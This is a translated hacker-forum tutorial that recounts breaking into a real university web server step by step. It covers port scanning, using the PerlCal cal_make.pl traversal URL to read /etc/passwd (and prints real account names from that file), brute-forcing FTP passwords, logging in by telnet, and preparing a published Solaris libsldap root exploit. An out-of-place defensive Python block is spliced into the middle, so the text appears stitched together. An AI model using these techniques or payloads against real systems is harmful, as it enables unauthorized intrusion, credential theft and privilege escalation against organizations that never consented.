Experiment 6: combining with other vulnerabilities to modify system settings, read system files, execute system commands, and so on

Browser-related vulnerabilities are so numerous that there is no shortage of bugs that can be chained with cross-site scripting. I think everyone is already clear on these: the recent IE title-bar modification bug, the incorrect-MIME-type command execution bug, and the many varieties of worms are all good examples.
More examples can be found at the following links:

Internet Explorer Pop-Up OBJECT Tag Bug
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html

Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html

MSIE6 can read local files
http://www.xs4all.nl/~jkuperus/bug.htm

MSIE may download and run programs automatically
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html

File extensions spoofable in MSIE download dialog
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html

the other IE cookie stealing bug (MS01-055)
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html

Microsoft Security Bulletin MS01-055
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html

Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html

Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
http://www.kriptopolis.com/cua/eml.html
I couldn't really be bothered to write this article, but a while back, after I had K'd quite a few sites with this approach, Wuhen asked me to write it up, and on top of that Aoqi Xiongying, that scheming fellow, asked me to be moderator of the intrusion-examples board over at his place, so I had no choice but to take advantage of today's rain and grind out an article. Please point out any mistakes.

Of the several sites I cracked, www.uta.edu had the best security measures; the others weren't difficult, just the usual filtering-type nuisances. So I'll write up the process of cracking uta.edu. First, let's ping it:
C:\>ping www.uta.edu

Pinging sun250.uta.edu [129.107.56.154] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 129.107.56.154:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>
faint, looks like there's a firewall or ICMP filtering or something @_@ Never mind, at least we got the IP.

Next: we can see its web page, which means port 80 is probably open. So let's bring out the Swiss army knife, netcat. Hee hee, my favourite.
C:\>nc -vv 129.107.56.154 80
sun250.uta.edu [129.107.56.154] 80 (http) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Tue, 14 May 2002 07:03:02 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

127
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /<P>
</BODY></HTML>

0

sent 16, rcvd 480: NOTSOCK

C:\>
Heh, we've picked up a fair bit of useful information again. Let me explain: here I used GET / HTTP/1.1 to pull information about its web server. So what did we get? Only that it's Apache... faint, we didn't even get the version @_@ That made me angry, so I brought out the king of scanners, nmap @_@

Hee hee, personally I think nmap is far more useful than Shadow Security Scanner!! Haha, especially when it comes to version identification.

OK, let's scan. The version I used here is the NT build, downloadable from www.patching.net/abu @_@ but you have to install WinPcap first, a very good piece of software.
C:\>nmap -sS -O -vv 129.107.56.154

Starting nmap V. 2.54BETA32 ( www.insecure.org/nmap )

Host sun250.uta.edu (129.107.56.154) appears to be up ... good.
Initiating SYN Stealth Scan against sun250.uta.edu (129.107.56.154)
Adding open port 443/tcp
Adding open port 514/tcp
Adding open port 111/tcp
Adding open port 21/tcp
Adding open port 587/tcp
Adding open port 23/tcp
Adding open port 6000/tcp
Adding open port 80/tcp
Adding open port 22/tcp
Adding open port 32772/tcp
Adding open port 32771/tcp
Adding open port 3306/tcp
The SYN Stealth Scan took 33 seconds to scan 1554 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Interesting ports on sun250.uta.edu (129.107.56.154):
(The 1532 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
23/tcp     open        telnet
25/tcp     filtered    smtp
53/tcp     filtered    domain
80/tcp     open        http
111/tcp    open        sunrpc
137/tcp    filtered    netbios-ns
138/tcp    filtered    netbios-dgm
139/tcp    filtered    netbios-ssn
161/tcp    filtered    snmp
162/tcp    filtered    snmptrap
443/tcp    open        https
445/tcp    filtered    microsoft-ds
514/tcp    open        shell
587/tcp    open        submission
3306/tcp   open        mysql
6000/tcp   open        X11
6346/tcp   filtered    gnutella
6699/tcp   filtered    napster
32771/tcp  open        sometimes-rpc5
32772/tcp  open        sometimes-rpc7

Remote operating system guess: Sun Solaris 8 early acces beta through actual release
OS Fingerprint:
TSeq(Class=TR%IPID=I%TS=100HZ)
T1(Resp=Y%DF=Y%W=60DA%ACK=S++%Flags=AS%Ops=NNTNWM)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)

Uptime 7.325 days (since Tue May 07 07:03:54 2002)
TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 3F1DE88F 900E621B 22316BB6 E50C108F D6DE4B4B 7089B80B
IPID Sequence Generation: Incremental

Nmap run completed -- 1 IP address (1 host up) scanned in 50 seconds

C:\>

Let me explain: -sS selects a SYN scan (hee hee, I won't go into the principle); -O guesses the host's operating system, and everyone knows nmap's TCP/IP stack fingerprinting of operating systems is very good; -vv is so we can see the detailed process!
faint, so many filtered ports @_@ Damn, even SMTP on 25 and SNMP on 161 are filtered. The 32771 and 32772 ports here are random ports, which means someone is using this machine remotely @_@ so it looks like I need to be careful today, there's someone on it!! Still, there are a few ports that get me excited, such as 21, 22, 23, 111, 80, 514 and 3306.

OK, now let's look at the host type @_@ faint, it's actually Sun Solaris 8 early acces beta through actual release. At least it's not the latest version, so there's still something to work with @_@ but SunOS 5.8 doesn't seem to have many big bugs. Whatever, first I tried that ancient snmpXdmid remote overflow @_@ Result: failed, as expected; big sites like this are usually pretty solid @_@ Hmm, tried a few RPC ones too, none worked @_@

OK, the first round of probing is over. Now for round two: use nc again and look at each service's banner first.
Here are the nc results:

220 sun250 FTP server (Version wu-2.6.2(1) Tue May 7 09:50:51 CDT 2002) ready.

Damn, that gave me a fright @_@ wu-ftpd 2.6.2, so even with an account this route is a dead end.

SSH-2.0-OpenSSH_3.1p1

Ugh @_@ they really are wizards; such a high version, so the ssh route looks like hard going too.

A quick telnet to 23: all it shows is SunOS 5.8. Tried a few random accounts like test, none worked; this is no way to do it @_@

Ah, there's also MySQL on 3306, which looks more promising. Tried connecting with a client... it wants a password. faint

Is there really no way? I was really reluctant to go down the CGI road @_@ but oh well, no choice, here we go.

So I brought out SSS (our Shadow) to scan first @_@ Since I've never been able to find a good CGI scanner, I generally use SSS for CGI at the moment; annoying, so if anyone has a good one, remember to tell me.

I left it scanning slowly and went to play pool with x-laser @_@ Heh, x-laser had his exam today, wish him luck! Ugh, SSS really makes the wait painful... went to listen to some music; there's a new Japanese singer called Onitsuka Chihiro (鬼束千寻), her songs are very good, recommended.
SSS finished. Looking over the results, nothing special, but there is one CGI hole: cal_make.pl. Damn, after all that rambling we finally get to the point! I went to the hack.co.za mirror and looked it up, and found it belongs to the showfile type, meaning it can read files!! Haha, the description is as follows:

Name: PerlCal
About: cal_make.pl of the PerlCal script may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running on).
Exploit:
http://www.VULNERABLE.com/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
by: stan (stan@whizkunde.org)
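The showfile-type bug described in the advisory above, as an added defender-side example (constructed here, not PerlCal's code): the flawed open pattern, why the trailing %00 defeats an appended extension, a confined replacement, and a log-review check for the payload. BASE_DIR, SUFFIX and all function names are assumptions.

```python
import os
from urllib.parse import unquote

# Constructed example, not PerlCal's code: BASE_DIR and SUFFIX are assumed.
BASE_DIR = "/var/www/perlcal/data"   # hypothetical data directory
SUFFIX = ".cal"                      # hypothetical extension the script appends

def vulnerable_path(p0: str) -> str:
    """Mirror the flawed pattern: decode, join, append SUFFIX, let the OS resolve.
    %00 decodes to a NUL byte, and a C-level open() stops reading the name
    there, so the appended SUFFIX never reaches the filesystem."""
    raw = unquote(p0) + SUFFIX
    seen_by_open = raw.split("\x00", 1)[0]      # what open(2) actually sees
    return os.path.normpath(os.path.join(BASE_DIR, seen_by_open))

def safe_path(p0: str) -> str:
    """Hardened version: refuse NUL bytes, canonicalise, and require the
    result to remain inside BASE_DIR (a plain startswith() prefix check is
    not enough, since a sibling like 'data2' would pass it)."""
    raw = unquote(p0)
    if "\x00" in raw:
        raise ValueError("NUL byte in parameter")
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, raw + SUFFIX))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes data directory")
    return candidate

def is_rejected(p0: str) -> bool:
    """True when safe_path refuses the parameter."""
    try:
        safe_path(p0)
        return False
    except ValueError:
        return True

def is_traversal_attempt(p0: str) -> bool:
    """Log-review check for the two tell-tale signs in the quoted payload:
    an encoded NUL and a '..' path component."""
    raw = unquote(p0)
    return "\x00" in raw or ".." in raw.split("/")

# Constructed sample: the exact parameter value from the advisory above.
PAYLOAD = "../../../../../../../../../../../../etc/passwd%00"

if __name__ == "__main__":
    print("vulnerable open() would read:", vulnerable_path(PAYLOAD))
    print("hardened version rejects it: ", is_rejected(PAYLOAD))
    print("log check flags it:          ", is_traversal_attempt(PAYLOAD))
```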
This should be a bug in a counter program. Heh heh, it seems even uta.edu has a chink in its armour; CGI and UDP are generally overlooked. Let's try this hole now @_@

Enter the following in the browser:

http://www.uta.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00

YAHOOOOOOOOOOOOOOOOOOOOO, we succeeded, we got it! Hahahaha, sweet; seeing this many accounts, I have a feeling I'm going to strike it rich today. It displays as follows:
root:x:0:1:Super-User:/:/sbin/sh
acctmgr:x:0:3040:SUID Account Manager:/home/acs/acctmgr:/usr/bin/tcsh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
bbuser:x:200:3040:Big Brother User Account:/home/acs/bbuser:/usr/bin/tcsh
lynx:x:201:50:Apache User:/:/usr/local/bin/false
mysql:x:29840:1::/home/mysql:/bin/sh
jth:x:12715:10:JASON T
.......
There are many more below; for reasons of space I won't list them @_@ But this passwd has been shadowed, so what now? A lot of people give up at this point, but if I gave up I couldn't be leader of the Phantom Troupe (幻影旅团). The first reaction to getting usernames should be joy, especially when you get a lot of them, because it means weak passwords may well exist!

So our plan now is to separate out the usernames and make a dictionary, then run it! This is where the FTP service from earlier shows its importance!!!

OK, easier said than done: separating out the usernames isn't so simple! First there's the format problem: the format shown in the browser differs from the standard passwd format.

If it's the standard format, we can separate them directly under Linux like this. Suppose pp is a passwd file; then I run

$ cut -d: -f 1 pp > tt

This one command does the job and writes the result to the file tt. -d sets ":" as the delimiter, -f says take the first field. That makes it very convenient to pull out the users.

A method syshunter offered is to use awk (corrected here: with ":" as the field separator it prints the usernames of accounts whose login shell is bash; the original compared the whitespace-separated last field to "bash", which never matches a passwd line):

cat passwd | awk -F: '$NF ~ /bash$/ {print $1}'

But none of these work all that well, so at this point my deputy leader atomic promptly wrote a small program, to the spec needed, for separating out usernames; very handy.

Atomic says: Reply to syshunter: atomic here, I found a simpler way to extract usernames. My program handles multi-line and single-line input alike, whether everything is lumped on one line (as you get from ?../../../etc/passwd) or cat'ed out :)

Haha, his really is handy, and it's a Windows GUI; it also has a feature to find empty passwords. It can be downloaded from http://apower.uhome.net/getusers.exe @_@

By the way, coolfire's old username separator doesn't work @_@
So I got a few hundred usernames!!!! I immediately loaded them into Liuguang (流光) and ran it against FTP.

Ugh @_@ the first pass found nothing at all @_@

Damn, I don't believe it! A few hundred users and no weak passwords? Something's off, so I lowered the thread count.

Rested a while... finally some results, but only 3.

I couldn't wait to telnet in. Ugh @_@ couldn't get in, no way... Looked back at the passwd file: ugh, this one actually has no shell. faint

Switch... finally an account, tt, that has a shell.

Heh, good things take time; now telnet in!!!!!!

So I got a shell, and hurried to look for the web directory: find / -name "index.htm" -print

Ugh, it found plenty, but none of them was it; looks like insufficient privileges!!

I gritted my teeth and decided to get root. A first find turned up no usable suid shell.

Hmm, the security setup looks decent; luckily it still lets me generate core files, so I prepared for a local overflow.

I found some code on Anjiao (安焦); heh heh, I've succeeded with it domestically, now let's see. Below is the post I made on safechina about the SunOS 5.8 local overflow:
-----------------------------------------------------------------------------------------------------------------------------
I remember cooldidi asking me a while ago about privilege escalation under SunOS 5.8.

At the time there was no need for it, so I didn't pay attention; now that I need it, I looked it up :)

First, gcc on Solaris is generally at /usr/local/bin/gcc

so it can be compiled with gcc; the code is on Anjiao.

====================================================
From: Noir Desir <noir@gsu.linux.org.tr>
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Subject: Solaris 8 libsldap exploit
Date: 2001-7-5 14:14:00
====================================================
Hi,

I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, sway@hack.co.za did actually found the hole several months ago and generously let me know about it. All propz goes to him. Thanks bro.

Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success. I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me.

$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: noir@gsu.linux.org.tr
Bug discovery: sway@hack.co.za

Usage: ./libsldap-exp target#

target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64

$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#

PS: t(L)amer sahin, you're going to get such a kick up the backside that it comes out of your mouth. Just wanted you to know : )

Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos

cheers,
noir
/**
 ** !!!PRIVATE!!!
 ** noir@gsu.linux.org.tr
 ** libsldap.so.1 $LDAP_OPTIONS enviroment variable overflow exploit;
 **
 **/